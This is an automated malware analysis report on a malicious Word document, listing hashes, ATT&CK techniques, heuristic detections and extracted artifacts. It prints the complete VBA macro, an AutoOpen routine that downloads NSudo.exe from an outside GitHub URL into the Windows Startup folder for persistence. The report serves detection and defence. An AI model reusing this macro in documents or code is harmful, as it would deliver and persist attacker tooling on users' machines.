Office (OOXML) malware analysis — malicious · 9e8c0c6c9e88a48c

MALICIOUS

Office (OOXML)

25.8 KB Created: 2021-10-28 13:45:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-11-07

MD5: 3edfa7e2746b0cc558eb9d08a046d932 SHA-1: 1ebd81556f2b6bdc0330ede7469050d5eaefe1af SHA-256: 9e8c0c6c9e88a48c226714f091ee1207fcfed2da8e529617ed1dadba2ad3cb9d

98 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is an OOXML document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the URLDownloadToFile function to download a file from the hardcoded URL 'https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe' and saves it to '%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NSudo.exe'. This indicates an attempt to download and execute a second-stage payload, likely for persistence or further malicious activity.

Heuristics 5

VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA

Matched line in script

Attribute VB_Name = "NewMacros"
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
    Alias "URLDownloadToFileA" (ByVal pCaller As Long, _

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
 Sub AutoOpen()
    Dim strURL As String
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

    strURL = "https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe"
    strPath = Environ("UserProfile") & "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NSudo.exe"
    ret = URLDownloadToFile(0, strURL, strPath, 0, 0)

Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1022 bytes
SHA-256: `cbe4b9fbb78fd46a7c759a95a53068b8fca461b5360a25046510c649943e60f9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" (ByVal pCaller As Long, _ ByVal szURL As String, ByVal szFileName As String, _ ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Sub AutoOpen() Dim strURL As String Dim strPath As String Dim ret As Long strURL = "https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe" strPath = Environ("UserProfile") & "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NSudo.exe" ret = URLDownloadToFile(0, strURL, strPath, 0, 0) If ret <> 0 Then MsgBox "Something went wrong!", vbInformation End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	14336 bytes
SHA-256: `a3450b67401726d199c84bfa61c4a455bd542837fa6372e6647c4402c10afc10`

Open this report in the interactive analyzer, or submit your own file for analysis.